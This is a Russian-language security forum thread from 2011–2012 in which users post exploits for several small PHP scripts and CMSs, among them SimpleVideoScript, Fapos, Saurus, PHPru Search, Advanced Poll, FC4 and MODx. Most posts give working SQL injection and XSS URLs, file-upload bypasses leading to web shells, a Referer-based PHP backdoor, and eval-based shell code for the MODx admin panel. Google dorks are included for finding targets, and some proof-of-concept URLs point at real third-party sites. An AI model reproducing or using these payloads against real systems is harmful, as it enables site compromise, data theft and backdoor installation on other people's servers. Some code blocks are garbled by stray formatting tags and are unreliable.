ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.12.2011, 06:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
SimpleVideoScript (на данный момент последняя версия)
Оф. сайт: http://www.bonkenscripts.com/
Раскрытие путей:
Код:
Code:
Раскрытие путей через session_start() в admin.php
http://127.0.0.1/video/videos/watch.php?id[]=111
пассивная xss через $_SERVER['PHP_SELF'] в шаблоне
[CODE]
Code:
http://127.0.0.1/video/index.php/'>alert(/xss/)alert(/xss/)
alert(/hello world/)"[/COLOR] name="domain">
document.forms["form"].submit();
[/COLOR]
[/PHP]
то получим активную xss на главной
|
|
|
|
13.12.2011, 11:38
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от trololoman96
trololoman96 said:
SimpleVideoScript
(на данный момент последняя версия)
Оф. сайт:
http://www.bonkenscripts.com/
поэтому есть еще одна sql inj которой
register_globals = on
не нужен
Exploit:
Код:
Code:
http://site.ru/videos/watch.php?id=111'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--+
intext:"Website by Bonken"
Пример инъекции:
Код:
Code:
_ttp://3gtv.dk/videos/watch.php?id=111'+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13+and+'a'='b
|
|
|
18.12.2011, 05:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
32
|
|
Fapos CMS 1.3 RC3
Fapos CMS 1.3 RC3
Forum Module 1.5.3.7
Dork: Сайт управляется Бесплатной CMS Fapos
File Upload в модуле Forum [ \modules\forum\index.php].
При добавлении новой темы:
Код:
Code:
private $denyExtentions = array('.php', '.phtml', '.php3', '.html', '.htm', '.pl', '.PHP', '.PHTML', '.PHP3', '.HTML', '.HTM', '.PL', '.js', '.JS');
if (!empty($_FILES[$attach_name]['name'])) {
// Извлекаем из имени файла расширение
$ext = strrchr($_FILES[$attach_name]['name'], ".");
// Формируем путь к файлу
if (in_array( $ext, $extentions))
$file = $post_id . '-' . $i . '-' . date("YmdHi") . '.txt';
else
$file = $post_id . '-' . $i . '-' . date("YmdHi") . $ext;
$is_image = (in_array($ext, $img_extentions)) ? 1 : 0;
// Перемещаем файл из временной директории сервера в директорию files
if (move_uploaded_file($_FILES[$attach_name]['tmp_name'], R . 'sys/files/forum/' . $file)) {
chmod(R . 'sys/files/forum/' . $file, 0644);
При добавлении нового поста прикрепленным файлом:
Код:
Code:
private $denyExtentions = array('.php', '.phtml', '.php3', '.html', '.htm', '.pl', '.PHP', '.PHTML', '.PHP3', '.HTML', '.HTM', '.PL', '.js', '.JS')
if (!empty($_FILES[$attach_name]['name'])) {
// Извлекаем из имени файла расширение
$ext = strrchr($_FILES[$attach_name]['name'], ".");
// Формируем путь к файлу
if (in_array( $ext, $extentions) || empty($ext)) {
$file = $post_id . '-' . $i . '-' . date("YmdHi") . '.txt';
} else {
$file = $post_id . '-' . $i . '-' . date("YmdHi") . $ext;
}
$is_image = 0;
if ($_FILES[$attach_name]['type'] == 'image/jpeg'
|| $_FILES[$attach_name]['type'] == 'image/jpg'
|| $_FILES[$attach_name]['type'] == 'image/gif'
|| $_FILES[$attach_name]['type'] == 'image/png') {
$is_image = 1;
}
// Перемещаем файл из временной директории сервера в директорию files
if (move_uploaded_file($_FILES[$attach_name]['tmp_name'], R . 'sys/files/forum/' . $file)) {
chmod(R . 'sys/files/forum/' . $file, 0644);
После загрузки шелл будет:
Код:
Code:
[target]/sys/files/forum/$post_id-$i-date("YmdHi").pHp [Имя файла можно посмотреть в созданном вами посте]
Еще забавная штука: если разрешено оставлять комментарии юзеру с правами "Гость", можно комментировать от любого имени (даже админского =)).
|
|
|
|
23.12.2011, 05:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
32
|
|
Saurus CMS CE Version 4.7 @ 01.12.2011 [http://www.saurus.info/get-saurus-cms/]
HTTP Response Splitting/Path Disclosure
Уязвимость существует при обработке входных данных в параметре "url" сценария "redirect.php" [/editor/redirect.php].
Код:
Code:
if($_GET['url'])
{
$url = urldecode($_GET['url']);
//prevent Response Splitting attack
$url = preg_replace("!\r|\n.*!s", "", $url);
header('Location: '.$_GET['url']);
}
else
{
header('Location: index.php');
}
Код:
Code:
http://[host1]/sau/editor/redirect.php?url=http://[host2]/target.php%0d%0aSet-Cookie: Name=Value
Интерпретатор PHP содержит защиту от атак, начиная с версий 4.4.2 и 5.1.2.
В виду того, что у меня в наличии имеется только версия PHP Version 5.2.12, попробовать не удалось.
Поэтому, Path Disclosure:
Код:
Code:
http://www.saurus.info/editor/redirect.php?url=%0D%0ALocation:%20http://www.google.com
=> Warning: Header may not contain more than a single header, new line detected. in /data01/virt2962/domeenid/www.saurus.ee/htdocs/editor/redirect.php on line 88
Код:
Code:
Path Disclosure: Illegal Session Injection
Пишем вместо PHPSESSID всякую #$&%^**(@#:
=> Warning: session_start() [function.session-start]: The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /data01/virt2962/domeenid/www.saurus.ee/htdocs/index.php on line 236
Способы заливки шелловопубликованы: [#_1] [#_2]
|
|
|
|
28.12.2011, 14:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
32
|
|
Fapos CMS 1.3 RC3
Foto Module
Dork: Сайт управляется Бесплатной CMS Fapos
File Upload в модуле Foto [ /foto/add_form/], при добавлении нового материала в фотокаталог. Обход проверки осуществляется подделкой Сontent-Type.
Код:
Code:
/* check file */
if (empty($_FILES['foto']['name'])) {
$error = $error .''.__('Not attaches').''. "\n";
} else {
if ($_FILES['foto']['size'] > Config::read('max_file_size', 'foto'))
$error = $error .''. sprintf(__('Wery big file2'), Config::read('max_file_size', 'foto')/1000) .''."\n";
if ($_FILES['foto']['type'] != 'image/jpeg' &&
$_FILES['foto']['type'] != 'image/gif' &&
//$_FILES['foto']['type'] != 'image/bmp' &&
$_FILES['foto']['type'] != 'image/png')
$error = $error .''.__('Wrong file format').''."\n";
}
Шелл будет находиться:
Код HTML:
HTML:
http://[target]/sys/files/foto/full/[№file].php
|
|
|
|
29.12.2011, 19:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
PHPru Search v.2.6
Произвольное выполнение php кода
Уязвимый код в index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$NEW[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'^^'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$searchstring[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'^^'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"HTTP_REFERER"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'^^'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$IP[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]PHPruSave[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$NEW[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'sinc/query.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'a+'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Для эксплуатации уязвимости нужно выполнить поиск по сайту с любым кейвордом при этом подделав свой реффер например через плагин tamper data для файрфокса на что то типа такого
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
после чего идем сюда:
Код:
Code:
http://127.0.0.1/phprusearch/sinc/query.php?cmd=phpinfo();
и делаем уже с бекдором то что хотим
|
|
|
|
31.12.2011, 21:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
[B][SIZE="2"][COLOR="Green"]Advanced Poll version )
Эксплуатация:
Код:
Code:
http;//site.ltd/poll/demo_3.php?poll_id=1+or+1+group+by+concat_ws(0x3a,version(),rand(0)|0)+having+min(0)--+f
Результат:
Код:
Code:
Error Number: 1062 Duplicate entry '5.0.77:1' for key 'group_key'
В файл demo_3.php инклудится уязвимый скрипт class_poll.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]is_valid_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT poll_id FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_index'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" WHERE poll_id=[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]AND status[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
} else {
return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
Dork: inurl:"popup.php?action=results"
Результатов: примерно 204 000 (0,23 сек.) Развлекатейсь
PoC:
Код:
Code:
http://www.bookmine.com/poll/demo_3.php?poll_id=11+or+1+group+by+concat_ws(0x3a,version(),rand(0)|0)+having+min(0)--+f
© Ereee |
|
|
|
02.01.2012, 16:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
[B][SIZE="2"][COLOR="Green"]MDS-JOB version
|
|
|
|
02.01.2012, 22:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
FC4 - Счетчик посетителей вебсайта
Офф сайт:http://linesoft.org/
Описание:SQL inj
Зависимости:mg=off и rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)
Файл: /admin/index.php
Уязвимый код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"Counter"[/COLOR][COLOR="#007700"])
{
echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$AllCommands[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Counter.Change"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM fc4 WHERE Name=\"[/COLOR][COLOR="#0000BB"]$Name[/COLOR][COLOR="#DD0000"]\""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])
or print([/COLOR][COLOR="#DD0000"]"Ошибка при MySQL запросе: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
Авторизации никакой не требуется, там еще есть инъекции в insert,update,delete, эта самая простая
Exploit
Код:
Code:
http://127.0.0.1/fc4-0.34/admin/index.php?cmd=Counter&Name=tdsadas"+and+5=4+union+select+1,2,3,4,5,6,7,version()--+
Описание:пассивная xss
Зависимости:rg = on
Файл: admin/counter_form.php
Уязвимый код:
PHP код:
PHP:
[COLOR="#000000"]
[/COLOR]">
[/COLOR]
из за того что register_globals = on и переменные в скрипте не определены по умолчанию, мы можем поменять их содержание
Exploit
Код:
Code:
http://127.0.0.1/fc4-0.34/admin/counter_form.php?cmd=">alert(/xss/)
============================
LS GuestBook v1.0
Офф сайт:http://linesoft.org/
Описание:пассивная xss
Зависимости:rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)
Файл: /guestbook.php
Уязвимый код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Пароль[/COLOR][COLOR="#007700"]:
[/COLOR][/COLOR]
$new_pwd обьявляеться в скрипте только если файла pwd.dat нет, а его нет только при 1 заходе
и установки пароля администратора
Exploit
Код:
Code:
http://www.bes-chagda.ru/ls_guestbook/guestbook.php?go=auth&new_pwd=1>alert(/xss/)
пароль администратора есть в куках, зашифрован в md5
=====================
LS Logs 1.22
Офф сайт:http://linesoft.org/
Описание:пассивная xss
Зависимости: rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)
Файл: /logsa.php
Уязвимый код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[[/COLOR][COLOR="#0000BB"]Фильтр[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]строка в url[/COLOR][COLOR="#007700"]:
[/COLOR][/COLOR]
Exploit
Код:
Code:
http://127.0.0.1/LSLogs/example/logsa.php?filter_string=">alert(/xss/)
|
|
|
|
06.01.2012, 10:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Заливка шелла в MODx
Заливка шелла в MODx(тестил на 1.0.5)
1-вариант. Через модуль Doc Manager(можно любой другой или создать свой, юзал Opera):
1) Админка(http://site/manager/) => Сайт => Модули => Doc Manager => В поле "Код модуля(php)" вставляем:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'e'[/COLOR][COLOR="#007700"]])) eval([/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'e'[/COLOR][COLOR="#007700"]]));[/COLOR][/COLOR]
Сохраняем.
2) Идем:
Админка => Модули => Doc manager(жмите на него колесиком[mouse3])
Открывается новое окно "Менеджер ресурсов". Скопируте адресную строку(http://site/manager/index.php?a=112&id=1).
Жмем Ctrl+U, в самый верх пишем:
Применяем изменения. Видим огромную ссылку "ЖМИ", жмем и видим phpinfo();. Если не менять исходник, ругается двиг, типа Anti-CSRF.
2-вариант. Банально:
1) Идем:
Админка > Инструменты => Конфигурация => Файл-менеджер
В поле "Разрешенные к загрузке файлы" через запятую добавляем php.
2) Идем:
Админка => Элементы => Управление файлами => Внизу "Обзор" => Льем шелл в любую папку.
3-вариант. Редактируем прямо из админки php-файлы(если права есть):
1) Идем:
Админка => Элементы => Управление файлами
Видим файлы, рядом с доступной для записи файлов есть зеленая галка, жмем. Появится поле, вставляем код, жмем "Сохранить".
Шелл доступен по адресу http://site.ltd/redaktirovanyi_file.php
---
Раскрытие пути(тестил на 1.0.5)
Код:
Code:
http://site/assets/cache/siteCache.idx.php
http://site/assets/plugins/managermanager/example.mm_rules.inc.php
http://site/assets/plugins/managermanager/default.mm_rules.inc.php
http://site/assets/plugins/managermanager/mm.inc.php
etc.
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
